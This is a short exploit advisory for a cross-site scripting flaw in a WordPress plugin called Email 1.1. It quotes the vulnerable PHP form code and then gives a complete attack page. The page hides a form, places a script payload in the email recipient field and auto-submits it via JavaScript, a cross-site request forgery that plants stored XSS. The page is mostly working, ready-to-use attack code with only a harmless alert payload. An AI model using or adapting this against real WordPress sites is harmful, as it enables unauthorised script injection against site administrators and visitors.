######################
# Exploit Title : Wordpress Email 1.1 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
# Vulnerable code :
<tr valign="top">
<th scope="row"><label for="<?php echo $email_fromPname;
?>">From</label></th>
<td>
<input type="text" id="<?php echo $email_from_name; ?>"
name="<?php echo $email_from_name; ?>" style="width: 25%"
value="<?php echo get_bloginfo( 'site_name' ); ?>" placeholder="The name in the From
field">
<input type="text" id="<?php echo $email_from; ?>" name="<?php echo $email_from;
?>"
style="width: 25%" value=/><script>alert(123)</script> placeholder="The email address to
send from">
</td>
</tr>
#####################
Exploit Code:
<html>
<body>
<style>
#test{
display:none;
}
</style>
<form name="send" method="post"
<div id="test">
<table class="form-table">
<tbody>
<tr valign="top">
<select id="email_type" name="email_type">
<option val="post">post</option>
</select>
</td>
</tr>
<td>
<select id="email_action" name="email_action">
<option val="0">new</option>
</select>
</td>
</tr>
<td>
<input id="email_from_name" type="hidden"
name="email_from_name" style="width: 25%" value="wordpress" placeholder="The name in
the From field">
<input id="email_from" type="hidden" name="email_from"
style="width: 25%" value="1@1.com" placeholder="The email address to send from">
</td>
</tr>
<td>
<select id="email_to_role" name="email_to_role"
class="chosen-select select-role" data-placeholder="Choose a role (optional)" style="width:
25%">
<option></option>
</select>
<input id="email_to" name="email_to"
value='"><script>alert(1)</script>' style="width: 70%" placeholder="Additional email
addresses">
</td>
</tr>
<td>
<select id="email_cc_role" name="email_cc_role"
class="chosen-select select-role" data-placeholder="Choose a role (optional)" style="width:
25%">
<option></option>
</select>
<input type="hidden" id="email_cc" name="email_cc"
style="width: 70%" placeholder="Additional email addresses">
</td>
</tr>
<td>
<select id="email_bcc_role" name="email_bcc_role"
class="chosen-select select-role" data-placeholder="Choose a role (optional)" style="width:
25%">
<option></option>
</select>
<input type="hidden" id="email_bcc" name="email_bcc"
style="width: 70%" placeholder="Additional email addresses">
</td>
</tr>
<td>
<input type="hidden" name="email_subject" style="width:
50%" value="[[site_name]] [post_title] [action]"> Example: "[My Site] Hello World! updated"
</td>
</tr>
<td>
<div id="wp-email_message-wrap" class="wp-core-ui wp-editor-wrap
html-active"><link rel='stylesheet' id='editor-buttons-css'
<div id="wp-email_message-editor-container" class="wp-editor-container"><textarea
class="wp-editor-area" rows="20" cols="40" name="email_message"
id="email_message">1</textarea></div>
</div>
</td>
</tr>
<td>
<input type="hidden" name="email_hidden" value="Y">
</td>
</tr>
</form>
</div>
<script language="Javascript">
setTimeout('send.submit()', 1);
</script>
</form>
</body>
</html>
